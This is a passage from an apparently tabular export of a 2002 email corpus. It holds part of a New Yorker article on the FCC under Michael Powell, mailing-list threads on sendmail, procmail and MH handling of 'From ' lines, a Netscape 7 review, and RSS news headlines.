Patrick Wood, the head of the Texas Public Utility Commission and, as \n&gt; such, a George W. Bush guy. In Texas, however, Wood had crossed the most \n&gt; powerful person in the arbock camp, Edward Whitacre, the C.E.O. of \n&gt; S.B.C. Communications, which is headquartered in San Antonio. This meant \n&gt; that the arbocks didn't want Wood as head of the F.C.C., because he \n&gt; might be too pro-see-leck. (Wood is now the head of the Federal Energy \n&gt; Regulatory Commission.) Michael Powell had to signal the arbocks that he \n&gt; wasn't as threatening as Wood, while also signalling the conservative \n&gt; movement that he was only negligibly farther to the left than \n&gt; Furchtgott-Roth.\n&gt; \n&gt; Powell did this deftly. For example, in December of 2000 he appeared \n&gt; before a conservative group called the Progress &amp; Freedom Foundation and \n&gt; gave a very Michael Powell speechwhimsical, intellectual, and \n&gt; free-associative (Biblical history, Joseph Schumpeter, Moore's Law)that \n&gt; began by making fun of the idea that the F.C.C. should try to keep new \n&gt; telecom companies alive. "In the wake of the 1996 Act, the F.C.C. is \n&gt; often cast as the Grinch who stole Christmas," Powell said. "Like the \n&gt; Whos, down in Who-ville, who feast on Who-pudding and rare Who-roast \n&gt; beast, the communications industry was preparing to feast on the \n&gt; deregulatory fruits it believed would inevitably sprout from the Act's \n&gt; fertile soil. But this feast the F.C.C. Grinch did not like in the \n&gt; least, so it is thought." Thus Powell was indicating that if he became \n&gt; chairman he didn't expect to administer first aid to the see-lecks as \n&gt; part of the job. He was appointed to the chairmanship on the first day \n&gt; of the Bush Administration.\n&gt; \n&gt; Twenty months into the Administration, nearly all the see-lecks are dead \n&gt; or dying; nearly all long-distance companies, not just WorldCom, are in \n&gt; serious trouble; cable companies have lost half their value; satellite \n&gt; companies are staggering. The crash has had an automatically \n&gt; concentrating effect, because as new companies die the existing \n&gt; companies' market share increases, and, if the existing companies are in \n&gt; good shape financially, they have the opportunity to pick up damaged \n&gt; companies at bargain prices. During the Bush Administration, as the \n&gt; financial carnage in communications has worsened, the communications \n&gt; industry has moved in the direction of more concentration. If the Bells \n&gt; wind up protecting their regional monopolies in local phone service, and \n&gt; if they also merge, the country will be on its way to having a national \n&gt; duopoly in local service: Verizon, in the East, and S.B.C., in the West. \n&gt; And these companies could dominate long distance as well, because of the \n&gt; poor health of the long-distance companies.\n&gt; \n&gt; The cable business also seems close to having two dominant national \n&gt; companies, AOL Time Warner and Comcast. Unlike the phone companies, they \n&gt; don't have to share their wiring with other companies and so can more \n&gt; fully control what material they allow to enter people's homes. As part \n&gt; of the complicated bargaining with interest groups that led to the 1996 \n&gt; Telecom Act, the limits on concentration in the radio industry were \n&gt; significantly loosened, and in the past six years the number of \n&gt; radio-station owners in the United States has been cut by twenty-five \n&gt; per cent; today, a large portion of local and national radio news \n&gt; programming is supplied by a single company, Westwood One, a subsidiary \n&gt; of Viacom.\n&gt; \n&gt; In this situation, many Democrats and liberals think, the F.C.C. should \n&gt; be hyperactivethe superhero of government regulation, springing to the \n&gt; rescue of both consumers and the communications industry. It should try \n&gt; to breathe life into the see-lecks and other new companies. It should \n&gt; disallow mergers, maintain ownership limits, and otherwise restrain the \n&gt; forces of concentration. It should use the government's money and muscle \n&gt; to get new technologyespecially fast Internet connectionsinto the \n&gt; homes of people who can't afford it at current market prices. (An \n&gt; analogy that a lot of people in F.C.C. World make is between telecom and \n&gt; the Middle East: the Clinton people blame the bloodshed on the Bush \n&gt; people, because they disengaged when they came into office, and the Bush \n&gt; people blame it on the Clinton people, because they raised too many \n&gt; expectations and stirred too many passions.)\n&gt; \n&gt; But Michael Powell's F.C.C. has not been hyperactive. Powell has been \n&gt; conducting internal policy reviews and reforming the management of the \n&gt; F.C.C. and waiting for the federal courts and the Congress to send him \n&gt; signals. (In mid-September, Powell finally initiated a formal review of \n&gt; the F.C.C.'s limits on media concentration.) This doesn't mean he has \n&gt; been inactive; rather, he has been active in a way that further \n&gt; infuriates his criticsin a manner that smoothly blends the genial and \n&gt; the provocative, he muses about whether the fundamental premises of \n&gt; F.C.C. World really make sense, while giving the impression that he's \n&gt; having the time of his life as chairman. At his first press conference, \n&gt; when he was asked what he was going to do about the "digital \n&gt; divide"that is, economic inequality in access to the Internethe said, \n&gt; "You know, I think there is a Mercedes divide. I'd like to have one and \n&gt; I can't afford one." At the National Cable &amp; Telecommunications \n&gt; Association convention, in Chicago, Powell, following a troupe of \n&gt; tumblers to the stage, interrupted his walk to the podium to perform a \n&gt; somersault.\n&gt; \n&gt; \n&gt; Not long ago, I went to see Powell in his office at the F.C.C. Until \n&gt; 1998, when the commission moved to a new building in Southwest \n&gt; Washington, near the city's open-air fish market, F.C.C. World was at \n&gt; the western edge of downtown, where everybody would encounter everybody \n&gt; else at a few familiar restaurants and bars. Today, the F.C.C. building \n&gt; looks like the office of a mortgage company in a suburban office park. \n&gt; Even the chairman's suite, though large, is beige, carpeted, and \n&gt; fluorescent. Powell is a bulky man who wears gold-rimmed glasses and \n&gt; walks with a pronounced limp, the result of injuries he suffered in a \n&gt; jeep accident in Germany, in 1987, when he was an Army officer. Because \n&gt; of the accident, he left the Army and went to law school, where he \n&gt; became entranced with conservative ideas about regulation, particularly \n&gt; the idea that the government, rather than trying to correct the flaws of \n&gt; the market before the fact"prophylactically," as he likes to sayshould \n&gt; wait till the flaws manifest themselves and then use antitrust \n&gt; litigation to fix them. He worked briefly at a corporate law firm, and \n&gt; then became a protg of Joel Klein, the head of the antitrust division \n&gt; of the Clinton Justice Department and the man who led the government's \n&gt; legal case against Microsoft. (He was recently appointed chancellor of \n&gt; the New York public-school system.) It testifies to Powell's political \n&gt; skill that he is probably the only high official in the Bush \n&gt; Administration who not only served in the Clinton Administration but \n&gt; also maintains close ties to Bush's nemesis Senator John McCain, of \n&gt; Arizona. One of the things about Powell that annoy people is his \n&gt; enduring love of law school"It's sort of like a law-school study \n&gt; session over there," one Democratic former commissioner said. As if to \n&gt; confirm the charge, Powell, when I arrived, introduced me to four law \n&gt; students, summer interns at the commission, whom he'd invited to sit in.\n&gt; \n&gt; I began by asking Powell whether he agreed with the founding assumptions \n&gt; of the F.C.C. For example, could private companies have apportioned the \n&gt; airwaves among themselves without the government being involved?\n&gt; \n&gt; "I think we'll never know," Powell said. "I don't think it's an \n&gt; automatically bad idea, the way some people will argue. Land is probably \n&gt; the best analogue. We don't seize all the land in the United States and \n&gt; say, 'The government will issue licenses to use land.' If my neighbor \n&gt; puts a fence one foot onto my property line, there's a whole body of law \n&gt; about what I can do about that, including whether I can tear it down. If \n&gt; a wireless company was interfering with another wireless company, it's a \n&gt; similar proposition. There are scholars who argueindeed, the famous \n&gt; Ronald Coase treatise that won the Nobel Prize was about thisthat \n&gt; spectrum policy is lunacy. The market could work this out, in the kinds \n&gt; of ways that we're accustomed to."\n&gt; \n&gt; Talking to Powell was fun. Unlike most high government officials, he \n&gt; doesn't seem to be invested in appearing dignified or commanding. He \n&gt; slumps in his chair and fiddles with his tie and riffs. He speaks in \n&gt; ironic air quotes. He's like your libertarian friend in college who \n&gt; enjoyed staying up all night asking impertinent rhetorical questions \n&gt; about aspects of life that everybody else takes for granted but that he \n&gt; sees as sentimental or illogical. After a while, I asked him whether he \n&gt; thought his predecessors' excitement about the 1996 Telecommunications \n&gt; Act had been excessive.\n&gt; \n&gt; "I would start with a caveat," Powell said. "Look, I can't fault those \n&gt; judgments in and of themselves, given the time and what people thought. \n&gt; They were not the only ones who were hysterical about the opportunities. \n&gt; But, frankly, I've always been a little bit critical. First of all, \n&gt; anybody who works with the act knows that it doesn't come anywhere close \n&gt; to matching the hyperbole that was associated with it, by the President \n&gt; on down, about the kinds of things it's going to open up. I mean, I \n&gt; don't know what provisions are the information-superhighway provisions, \n&gt; or what provisions are so digitally oriented, or some of the things that \n&gt; were a big part of the theatre of its introduction. When one starts \n&gt; reading the details, one searches, often in vain, for these provisions. \n&gt; But, nonetheless, there was a rising dot-com excitement, and an Internet \n&gt; excitement, and people thought this was historic legislation, and it \n&gt; certainly was.\n&gt; \n&gt; "But. We were sucking helium out of balloons, with the kinds of \n&gt; expectations that were being bandied around, and this is before the \n&gt; economy or the market even gets in trouble. It was a dramatically \n&gt; exaggerated expectationby the leadership of the commission, by \n&gt; politicians, by the market itself, by companies themselves. It was a \n&gt; gold rush, and led to some very detrimental business decisions, ones \n&gt; that government encouraged by its policies, frankly. Everybody wanted to \n&gt; see numbers go up on the board."\n&gt; \n&gt; Powell began imitating an imagined true believer in the Telecom Act. " \n&gt; 'I want to see ten competitors. Twenty competitors! I want to see \n&gt; thirty-per-cent market share. Fifty-per-cent market share! I want the \n&gt; Bells to bleed! Then we'll know we've succeeded.' " Now Powell returned \n&gt; to being Powell. "I think that expectation was astonishingly \n&gt; unrealistic, in the short term. They wanted to see it while they're \n&gt; there. We were starting to get drunk on the juice we were drinking. And \n&gt; the market was getting drunk on the juice we were drinking. There's no \n&gt; question, we went too soon too fast. Too many companies took on too much \n&gt; debt too fast before the market really had a product, or a business model."\n&gt; \n&gt; How could the Telecom Act have been handled better? "We could have \n&gt; chosen policies that were less hellbent on a single objective, and were \n&gt; slightly more balanced and put more economic discipline in the system," \n&gt; Powell said. "Money chased what seemed like government-promised \n&gt; opportunity. The problem with that is there's a morning after, and we're \n&gt; in it. And the problem is there is no short fix for this problem. This \n&gt; debt is going to take years to bring down to a realistic level. In some \n&gt; ways, for short-term gain, we paid a price in long-term stability."\n&gt; \n&gt; Powell went on to say that it might have turned out differently if there \n&gt; had been a more "reasonable" level of investment. "No, we wouldn't have \n&gt; every home in America with competitive choice yetbut we don't anyway. I \n&gt; don't think it's the remonopolization of telephone service. I don't buy \n&gt; that. The Bells will prosper, but did anybody believe they wouldn't? The \n&gt; part of the story that didn't materialize was that people thought so \n&gt; would MCI WorldCom and Sprint."\n&gt; \n&gt; Other local phone companies, he added, hadn't materialized as viable \n&gt; businesses, either, and they never might. "Everybody's always saying, \n&gt; 'The regulators did this and this and this.' But, candidly, the story's \n&gt; quite the opposite. I think the regulators bent over backward for six \n&gt; years to give them a chance. Conditions don't get that good except once \n&gt; every thirty years, and it didn't happen. So, whatever the reason, we're \n&gt; lookin</t>
  </si>
  <si>
    <t>http://www.fcc.gov http://www.intel.com http://www.newyorker.com http://endeavors.com</t>
  </si>
  <si>
    <t>To: Craig Hughes &lt;craig@deersoft.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 09 Oct 2002 18:23:20 +0100</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 18:23:20 +0100</t>
  </si>
  <si>
    <t>Craig Hughes &lt;craig@deersoft.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Re: fully-public corpus of mail available</t>
  </si>
  <si>
    <t>Craig Hughes said:\n\n&gt; &gt;   - All headers are reproduced in full.  Some address obfuscation has\n&gt; &gt;   taken place; hostnames in some cases have been replaced with\n&gt; &gt;   "spamassassin.taint.org", which should have a valid MX record (if I recall\n&gt; &gt;   correctly).  In &gt; most cases though, the headers appear as they were\n&gt; &gt;   received.\n&gt; \n&gt; Nope:\n&gt; \n&gt; [craig@balam craig]$ dig spamassassin.taint.org mx\n\nI knew there was something about spamassassin.taint.org ;)\n\nAh well, that's probably just as good anyway...\n\n--j.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: John Abreau &lt;jabr@blu.org&gt;\nDate: Wed, 09 Oct 2002 17:15:18 -0400</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 17:15:18 -0400</t>
  </si>
  <si>
    <t>John Abreau &lt;jabr@blu.org&gt;</t>
  </si>
  <si>
    <t>--==_Exmh_1405404058P Content-Type: text/plain; charset=us-ascii Jason Rennie  writes: &gt; My sysadmins have told me that the sending mail client is supposed to  &gt; escape lines begining with "From ".  EXMH (2.5) doesn't do this.  Should  &gt; it?  It appears that my MH is MH 6.8.  Does NMH fix this? Actually, this issue used to escalate into a religious war. The "From "  envelope is an artifact of the mbox mailbox format, and from that  perspective it should be the mail server that stores its mailboxes in mbox format that should be responsible for escaping lines beginning with  "From ". On the other hand, this breaks the assumption that the mail  transport only touches the message headers and leaves the message body  alone. Things like pgp signatures break when the mail server changes the message  body. Also, strictly speaking, the mbox format envelope (or for us old-timers,  the UUCP envelope) isn't just any line beginning with "From ". It's really  "From", a single space, a valid email address, two spaces, and a valid  date. For example:     From ptardif@nbnet.nb.ca  Sun Jul 14 08:53:57 2002         ^                   ^^ --  John Abreau / Executive Director, Boston Linux &amp; Unix  IM: jabr@jabber.blu.org / abreauj@aim / abreauj@yahoo / 28611923@icq Email jabr@blu.org / WWW [URL]http://www.abreau.net[/URL] / PGP-Key-ID 0xD5C7B5D9 PGP-Key-Fingerprint 72 FB 39 4F 3C 3B D6 5B E0 C8 5A 6E F1 2C BE 99    Some people say, "The enemy of my enemy is my friend."    I often respond, "When elephants fight, it's the grass    that gets trampled." --==_Exmh_1405404058P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.5 01/15/2001 iQCVAwUBPaScZlV9A5rVx7XZAQJlrgQAyxnhXLaYoas75wtCkQz7pr5jhTamXm9s 85Tx9R9YcZtAAK67wd7U6ZqIOcr+J76G/xn2+gm6ASVRL4/ipETx9AFhdq8pG//w sU/8zYCxOrnmqVI62sYaqx2m4m75IrnSdqR5ARKHc2U05zQq47xuMxSTIrC/dwKK oyAlEFSe8Rw= =mVfx -----END PGP SIGNATURE----- --==_Exmh_1405404058P-- _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.abreau.net https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: "James C. McMaster (Jim)" &lt;mcmasjc@tatanka.stortek.com&gt;\nDate: Wed, 09 Oct 2002 15:05:00 -0600</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 15:05:00 -0600</t>
  </si>
  <si>
    <t>"James C. McMaster (Jim)" &lt;mcmasjc@tatanka.stortek.com&gt;</t>
  </si>
  <si>
    <t>In message &lt;200210091925.g99JPGfJ001534@fsck.intern.waldner.priv.at&gt;, Robert  Wa ldner said: &gt;  &gt;  &gt; On Wed, 09 Oct 2002 14:43:32 EDT, Kevin Kenny writes: &gt; &gt;&gt; 3)  You can learn to use procmail, &gt;  &gt; &gt;Can this be done via .forward? &gt;  &gt; make your .forward contain only the following line: &gt; "|/usr/bin/procmail" &gt;  (incl. the quotes, your procmail binary may be in another path) &gt;  Check the procmail documentation.  They actually recommend: "|IFS=' '&amp;&amp;p=(PATH/TO/PROCMAIL)&amp;&amp;test -f $p&amp;&amp;exec $p -f-||exit  75#(UNIQUE_STRING)" I don't know what this does, but it is explained in the doc. --  Jim McMaster mailto:mcmasjc@tatanka.stortek.com _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: kennykb@crd.ge.com (Kevin Kenny)\nDate: Wed, 09 Oct 2002 14:43:32 -0400</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 14:43:32 -0400</t>
  </si>
  <si>
    <t>kennykb@crd.ge.com (Kevin Kenny)</t>
  </si>
  <si>
    <t>mcmasjc@tatanka.stortek.com said:\n&gt; 3)  You can learn to use procmail,\n\nCan this be done via .forward?  I don't have root on the machine my\nmailbox is on, and I'm absolutely certain that a complaint to the sysadmin\nabout sendmail will get a simple response: shut down the daemon and tell\nme to use Outlook. :(\n\n--\n73 de ke9tv/2, Kevin KENNY   GE Corporate Research &amp; Development\nkennykb@crd.ge.com           P. O. Box 8, Bldg. K-1, Rm. 5B36A\n                             Schenectady, New York 12301-0008 USA\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Wed, 09 Oct 2002 13:30:00 -0500</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 13:30:00 -0500</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; On Wed, 9 Oct 2002, "Jason" == Jason Rennie wrote:\n\n  Jason&gt; My sysadmins have told me that the sending mail client\n  Jason&gt; is supposed to escape lines begining with "From ".\n\nYour sysadmins are wrong.\n\nWhatever program that is used to store the mail into the \nbraindead "mailbox" file (/var/spool/mail/whatever) is supposed \nto escape a line that begins with From.  That program is called \nthe local Mail Delivery Agent (MDA)\n\nIt would be better if you never, ever, stored your mail in a \n"mailbox" file.\n\nIf your sysadmins are capable of it, get them to set up the \nreceiving Mail Transfer Agent (MTA) to allow the use of procmail \nas the local MDA.  Then use procmail to invoke rcvstore and \ndeliver your mail directly into your MH mail folders.\n\nMost Linux systems come configured this way, if a user has a\n$HOME/.procmail file then mail is delivered using procmail.\n\n\n--Hal\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: "James C. McMaster (Jim)" &lt;mcmasjc@tatanka.stortek.com&gt;\nDate: Wed, 09 Oct 2002 13:07:14 -0600</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 13:07:14 -0600</t>
  </si>
  <si>
    <t>In message &lt;200210091843.OAA01268@hippolyta.crd.ge.com&gt;, Kevin Kenny said: &gt;  &gt; mcmasjc@tatanka.stortek.com said: &gt; &gt; 3)  You can learn to use procmail, &gt;  It absolutely can be done from .forward.  I am in the same situation as you,  and that is how I do it. --  Jim McMaster mailto:mcmasjc@tatanka.stortek.com _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Jason Rennie &lt;jrennie@ai.mit.edu&gt;\nDate: Wed, 09 Oct 2002 12:57:13 -0400</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 12:57:13 -0400</t>
  </si>
  <si>
    <t>Jason Rennie &lt;jrennie@ai.mit.edu&gt;</t>
  </si>
  <si>
    <t>From</t>
  </si>
  <si>
    <t>When I receive a message that has a line starting with "From ", it's\nbroken into two messages.  I get my mail from /var/spool/mail.  The\nprogram that incorporates mail thinks that the "From " line starts a new\nmessage.\n\nMy sysadmins have told me that the sending mail client is supposed to \nescape lines begining with "From ".  EXMH (2.5) doesn't do this.  Should \nit?  It appears that my MH is MH 6.8.  Does NMH fix this?\n\nJason D. M. Rennie\nMIT AI Lab\njrennie@ai.mit.edu\n(617) 253-5339\n[URL]http://www.ai.mit.edu[/URL]\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.ai.mit.edu https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: "James C. McMaster (Jim)" &lt;mcmasjc@tatanka.stortek.com&gt;\nDate: Wed, 09 Oct 2002 12:16:39 -0600</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 12:16:39 -0600</t>
  </si>
  <si>
    <t>This is not an exmh problem, but an interaction between sendmail, Solaris and  mh. Your sysadmin is wrong.  It is the responsibility of the receiving mail  server to escape lines beginning with "From " if they choose to turn on that  facility.  It is not the responsibility for email clients to cater to the  stupid design of the unix mail spool, and Sun's even more stupid decision to  rely on "Content-length:" instead of dealing with this problem.  Since mh is  unaware of "Content-length:", rcvstore gags trying to parse messages from the  spool. I had this same problem.  There are several ways to fix it: 1)  Get your mail administrator to add the "E" flag to your sendmail.  This  means you will never see a line beginning with "From ".  Any such line will  look like "&gt;From ". 2)  There is a patch to mh to make it respect "Content-length:".  When I was  having this problem, porting this patch to nmh was low on the priority list,  then nmh development stalled for a long time.  I doubt it has been done, but  you can check with the nmh list at nmh-workers@mhost.com to find out for sure. 3)  You can learn to use procmail, invoking rcvstore directly instead of  letting sendmail put your incoming mail into the spool.  This avoids the  whole issue.  rcvstore only deals with a single message at a time, and  everything works. --  Jim McMaster mailto:mcmasjc@tatanka.stortek.com In message &lt;200210091657.g99GvDmX025433@life.ai.mit.edu&gt;, Jason Rennie said: &gt;  &gt; When I receive a message that has a line starting with "From ", it's &gt; broken into two messages.  I get my mail from /var/spool/mail.  The &gt; program that incorporates mail thinks that the "From " line starts a new &gt; message. &gt;  &gt; My sysadmins have told me that the sending mail client is supposed to  &gt; escape lines begining with "From ".  EXMH (2.5) doesn't do this.  Should  &gt; it?  It appears that my MH is MH 6.8.  Does NMH fix this? &gt;  &gt; Jason D. M. Rennie &gt; MIT AI Lab &gt; jrennie@ai.mit.edu &gt; (617) 253-5339 &gt; [URL]http://www.ai.mit.edu[/URL] &gt;  &gt;  &gt;  &gt;  &gt; _______________________________________________ &gt; Exmh-users mailing list &gt; Exmh-users@redhat.com &gt; [URL]https://listman.redhat.com[/URL] &gt;  _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.ai.mit.edu https://listman.redhat.com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: John Beck &lt;jbeck@eng.sun.com&gt;\nDate: Wed, 09 Oct 2002 11:42:49 -0700</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 11:42:49 -0700</t>
  </si>
  <si>
    <t>John Beck &lt;jbeck@eng.sun.com&gt;</t>
  </si>
  <si>
    <t>James&gt; This is not an exmh problem, but an interaction between sendmail,\nJames&gt; Solaris and mh.\n\nCorrect.\n\nJames&gt; Your sysadmin is wrong.  It is the responsibility of the receiving mail\nJames&gt; server to escape lines beginning with "From " if they choose to turn\nJames&gt; on that facility.  It is not the responsibility for email clients to\nJames&gt; cater to the stupid design of the unix mail spool, and Sun's even more\nJames&gt; stupid decision to rely on "Content-length:" instead of dealing with\nJames&gt; this problem.  Since mh is unaware of "Content-length:", rcvstore gags\nJames&gt; trying to parse messages from the spool.\n\nAlso correct.  In fairness, though I cannot defend the Content-Length: header\nas I consider it brain damage in the extreme, Sun inherited this from AT&amp;T.\n\nJames&gt; Get your mail administrator to add the "E" flag to your sendmail.\nJames&gt; This means you will never see a line beginning with "From ". Any such\nJames&gt; line will look like "&gt;From ".\n\nSpecifically, you will need to find a line in /etc/mail/sendmail.cf that\nstarts with "Mlocal" such as:\n\n[4784] grep ^Mlocal /etc/mail/sendmail.cf\nMlocal,         P=/usr/lib/mail.local, F=lsDFMAw5:/|@qPSXfmnz9E, S=EnvFromSMTP/HdrFromL, R=EnvToL/HdrToL,\n[4785] \n\nand make sure that 'E' appears in the long list of flags following "F=".\nIf your sys-admin uses m4 to generate sendmail.cf, and any good sys-admin\nshould, then here is the magic line for the .mc file:\n\nMODIFY_MAILER_FLAGS(`LOCAL', `+E')dnl\n\nJames&gt; You can learn to use procmail, invoking rcvstore directly instead of \nJames&gt; letting sendmail put your incoming mail into the spool.  This avoids\nJames&gt; the whole issue.  rcvstore only deals with a single message at a time,\nJames&gt; and everything works.\n\nAlso correct, though procmail per se is not needed, as other filters (such\nas slocal, which is part of the [n]mh distribution) do the trick just as well.\n\n-- John\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "Stephen D. Williams" &lt;sdw@lig.net&gt;,\nFrom: Udhay Shankar N &lt;udhay@pobox.com&gt;\nDate: Wed, 09 Oct 2002 10:35:55 +0530</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 10:35:55 +0530</t>
  </si>
  <si>
    <t>"Stephen D. Williams" &lt;sdw@lig.net&gt;,</t>
  </si>
  <si>
    <t>Re: ActiveBuddy</t>
  </si>
  <si>
    <t>At 12:05 PM 10/4/28 -0400, Stephen D. Williams wrote:\n\n&gt;Date: Wed, 04 Oct 2028 12:05:01 -0400\n&gt;\n&gt;I actually thought of this kind of active chat at AOL (in 1996 I think), \n&gt;bringing up ads based on what was being discussed and other features.  For \n&gt;a while, the VP of dev. (now still CTO I think) was really hot on the idea \n&gt;and they discussed patenting it.  Then they lost interest.  Probably a \n&gt;good thing.\n\n[note date: header]\n\nCan I borrow your time machine, pretty please?\n\nUdhay\n\n-- \n((Udhay Shankar N)) ((udhay @ pobox.com)) (([URL]www.digeratus.com[/URL]</t>
  </si>
  <si>
    <t>To: FoRK &lt;fork@spamassassin.taint.org&gt;\nFrom: Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt;\nDate: Wed, 09 Oct 2002 10:27:59 -0700</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 10:27:59 -0700</t>
  </si>
  <si>
    <t>Netscape 7 Review</t>
  </si>
  <si>
    <t>This is my Netscape 7.0 Review.\n\no They finally got the email search speed back up to\n   where it was in 4.7.x\no Setting up user mail accounts doesn't have that really\n   odd, sometimes it lets me sometimes it doesn't problem that\n   previous versions had.\no I still have to manually update all my address books by\n   hand but at least it lets me import them as Netscape 4.x\n   address books (there's not 6.x import as they just assume\n   it works--which it doesn't)\no The mail filters are still broken and have the same problem that\n   I've tried to report since 4.0.2 where you can't store a mail\n   filter of the type: Age in days, is greater than, 21 (or some number)\n   Gawd I'd really wish they'd fix that freakin' bug, it's the single\n   biggest annoyance that I have with Netscape as it's one of the\n   most effective anti-spam tools that I have.\no Webex doesn't support Netscape 7.0 and the plugin doesn't\n   work which causes problems when you want to use Webex to\n   work on something with someone remotely.\n\nI've given up trying to report bugs and any changes to the\nsource I send always get lost.\n\nGreg\n\n\n-- \nGregory Alan Bolcer, CTO  | work: +1.949.833.2800\ngbolcer at endeavors.com  | [URL]http://endeavors.com[/URL]\nEndeavors Technology, Inc.| cell: +1.714.928.5476</t>
  </si>
  <si>
    <t>http://endeavors.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:01:03 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:01:03 -0000</t>
  </si>
  <si>
    <t>newscientist &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Mystery Indian virus heading for Europe</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8668042,1440/\nDate: Not supplied\n\nThe virus has wiped most of India's vultures, causing ecological havoc - \nmigrating birds could now carry it to Europe and Africa</t>
  </si>
  <si>
    <t>http://www.newsisfree.com</t>
  </si>
  <si>
    <t>Critical breast cancer gene identified</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8664946,1440/\nDate: Not supplied\n\nDamaged forms of the newly identified gene are implicated in many breast and \nlung cancers - new treatments for thousands may result</t>
  </si>
  <si>
    <t>Neutrino and X-ray physicists win Nobel Prize</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8676018,1440/\nDate: Not supplied\n\nPioneering contributions to astrophysics have provided 'two new windows on the \nUniverse'</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:01:01 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:01:01 -0000</t>
  </si>
  <si>
    <t>US use of lie detector tests criticized</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8677924,1440/\nDate: Not supplied\n\nGovernment employees are routinely screened in a bid to spot spies - but the \ntesting is useless, says influential panel of scientists</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:57 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:57 -0000</t>
  </si>
  <si>
    <t>guardian &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>America's great misleader</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8674045,215/\nDate: 2002-10-08T16:56:00+01:00\n\n*World dispatch:* Bush's arguments strain the limits of plausibility to justify \nwar on Iraq, and this, says *Simon Tisdall*, means regime change is imperative \n- in Washington.</t>
  </si>
  <si>
    <t>JJB Sports chief found hanged</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8670380,215/\nDate: 2002-10-08T14:51:59+01:00\n\n*Business:* Illness and City's mailing of sports empire share are blamed for \ndeath.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 09 Oct 2002 08:00:56 -0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 08:00:56 -0000</t>
  </si>
  <si>
    <t>Doesn't smell like team spirit</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8688976,215/\nDate: 2002-10-09T03:15:14+01:00\n\n*Football:* It's a safe bet that Kurt Cobain hated sports. And when you look at \nthe England football team, it's difficult not to agree with him, writes *Steven \nWells*.</t>
  </si>
  <si>
    <t>BSkyB recruits heavyweight non-execs</t>
  </si>
  <si>
